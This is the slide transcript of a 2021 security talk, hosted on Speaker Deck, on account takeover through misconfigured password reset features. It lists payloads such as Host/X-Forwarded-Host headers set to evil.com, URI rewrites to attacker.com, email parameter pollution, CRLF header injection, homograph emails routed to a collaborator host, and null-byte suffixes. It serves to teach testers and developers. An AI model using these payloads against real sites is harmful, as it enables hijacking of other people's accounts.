Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Account Takeover via Exploiting Misconfigured P...

Tuhin Bose
November 06, 2021
Technology
2
2.1k

Account Takeover via Exploiting Misconfigured Password Reset Feature

Implementing a password reset function is a very challenging part for every developers. There is no well-defined standard on how to implement a secure password reset functionality in an application. That's why every application has a different way of implementation like sending unique URLs, generating a temporary password, security questions, OTP etc.

Every developer has a different approach of implementing such feature. That's why every time the hacker has to think of a new way to hack. In this talk, I'll be briefly telling some methodologies for achieving Account Takeover via exploiting misconfigured password reset functionality.

Tuhin Bose

November 06, 2021
Tweet

More Decks by Tuhin Bose

See All by Tuhin Bose
Wordpress Security
tuhin1729
1
1.4k
Abusing Password Reset Functionality
tuhin1729
0
700
Dependency Confusion
tuhin1729
0
710
2 Factor Authentication Bypass
tuhin1729
1
1.1k

Other Decks in Technology

See All in Technology
Amazon FSx for NetApp ONTAPを利用するにあたっての要件整理と設計のポイント
non97
1
160
【若手エンジニア応援LT会】AWSで繋がり、共に成長! ~コミュニティ活動と新人教育への挑戦~
kazushi_ohata
0
180
GitHub Universe: Evaluating RAG apps in GitHub Actions
pamelafox
0
180
MAMを軸とした動画ハンドリングにおけるAI活用前提の整備と次世代ビジョン / abema-ai-mam
cyberagentdevelopers
PRO
1
120
Vueで Webコンポーネントを作って Reactで使う / 20241030-cloudsign-vuefes_after_night
bengo4com
4
2.5k
APIテスト自動化の勘所
yokawasa
7
4.2k
Oracle Base Database Service 技術詳細
oracle4engineer
PRO
5
49k
プロダクト成長に対応するプラットフォーム戦略:Authleteによる共通認証基盤の移行事例 / Building an authentication platform using Authlete and AWS
kakehashi
1
150
分布で見る効果検証入門 / ai-distributional-effect
cyberagentdevelopers
PRO
4
700
pandasはPolarsに性能面で追いつき追い越せるのか
vaaaaanquish
4
4.7k
Gradle: The Build System That Loves To Hate You
aurimas
2
150
Commitment vs Harrisonism - Keynote for Scrum Niseko 2024
miholovesq
6
1.1k

Featured

See All Featured
Rails Girls Zürich Keynote
gr2m
93
13k
Gamification - CAS2011
davidbonilla
80
5k
Teambox: Starting and Learning
jrom
132
8.7k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
250
21k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
42
9.2k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.6k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
4
290
Become a Pro
speakerdeck
PRO
24
5k
Designing Experiences People Love
moore
138
23k
A Modern Web Designer's Workflow
chriscoyier
692
190k
Code Reviewing Like a Champion
maltzj
519
39k

Transcript

  1. Account Takeover via Exploiting Misconfigured Password Reset Feature By Tuhin

    Bose

  2. Who am I?

  3. Conclusion & QNA Conclusion & QNA What is Password What

    is Password Reset Feature? Reset Feature? Password Reset Password Reset Implementation Implementation Techniques Used by Techniques Used by Developers Developers ATO via Hacking ATO via Hacking Misconfigured Misconfigured Password Reset Feature Password Reset Feature AGENDA

  4. What is Password Reset Feature?

  5. Reset password is the action of invalidating the current password

    for an account on an application and then setting a new one. Most of the services have a password reset feature ("Forgot Password" service) which allows you to reset your password.

  6. Password Reset Implementation Techniques Used by Developers

  7. Password Reset Implementation Techniques Used by Developers

  8. ATO via Hacking Misconfigured Password Reset Feature

  9. Host Header Injection - Password Reset Host Header Injection -

    Password Reset Poisoning Poisoning 1 1. . Host: evil.com or X-Forwarded-Host: evil.com

  10. Password Reset Poisoning Password Reset Poisoning 1 1. .

  11. 2. Modifying Request-URI 2. Modifying Request-URI POST https://attacker.com/forgot-password HTTP/1.1 POST

    @attacker.com/forgot-password HTTP/1.1 POST :@attacker.com/forgot-password HTTP/1.1 POST /[email protected] HTTP/1.1

  12. 2. Modifying Request-URI 2. Modifying Request-URI

  13. 2. Modifying Request-URI 2. Modifying Request-URI

  14. 3. Token leakage 3. Token leakage

  15. 3. Token leakage 3. Token leakage https://www.company.com/#/changePassword/ username/token

  16. 4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

    [email protected]&[email protected] email[][email protected]&email[][email protected] [email protected]%[email protected] [email protected]|[email protected] [email protected],[email protected] [email protected]%[email protected] {"email":"[email protected]","email":"[email protected]"} {"email":["[email protected]","[email protected]"]}

  17. 4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

  18. 4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

  19. 5. Insecure Direct Object Reference (IDOR) 5. Insecure Direct Object

    Reference (IDOR) Use Param Miner to get extra parameters (or append previously known parameters) in the request. Now try IDOR.

  20. 5. Insecure Direct Object Reference 5. Insecure Direct Object Reference

  21. 6. Try homograph on password reset. 6. Try homograph on

    password reset. [email protected] email=victim@gmаil.com [email protected] Using Unicode: Cyrillic Small Letter A

  22. 6. Try homograph on password reset. 6. Try homograph on

    password reset. https://github.com/UndeadSec/EvilURL

  23. 6. Try homograph on password reset. 6. Try homograph on

    password reset. Steps to reproduce: 1. Create a new account with [email protected] 2. Go to password reset page and enter this email: tuhin1729@gmаil.com.xyz.burpcollaborator.net [Here "a" is different] If it's vulnerable then you'll get the password reset link to your collaborator server.

  24. 7. If they are sending an otp for password reset,

    7. If they are sending an otp for password reset, try 2fa bypass techniques. try 2fa bypass techniques. https://tinyurl.com/tuhin1729-2fa

  25. 8. 8. Append a .json after the endpoint. Append a

    .json after the endpoint.

  26. 9. Weak Encryption 9. Weak Encryption While generating password reset

    tokens, sometimes developers use weak encryption algorithms. For example, sometimes they just encrypt the user-id/username of user + timestrap using some weak encryption algorithms .

  27. POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1 10. 10. CRLF Injection CRLF Injection

  28. 10. 10. CRLF Injection CRLF Injection

  29. 11. Change the request method and content-type and observe how

    the application is responding. Original Modified

  30. 12. Append null bytes after your email and observe the

    response. {"email":"[email protected]"} {"email":"[email protected]%00"} %00, %0d%0a, %0d, %0a, %09, %0C, %20

  31. More: More: https://tinyurl.com/tuhin1729-passwordreset

  32. Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729 Thank You!

    Thank You! Thank You!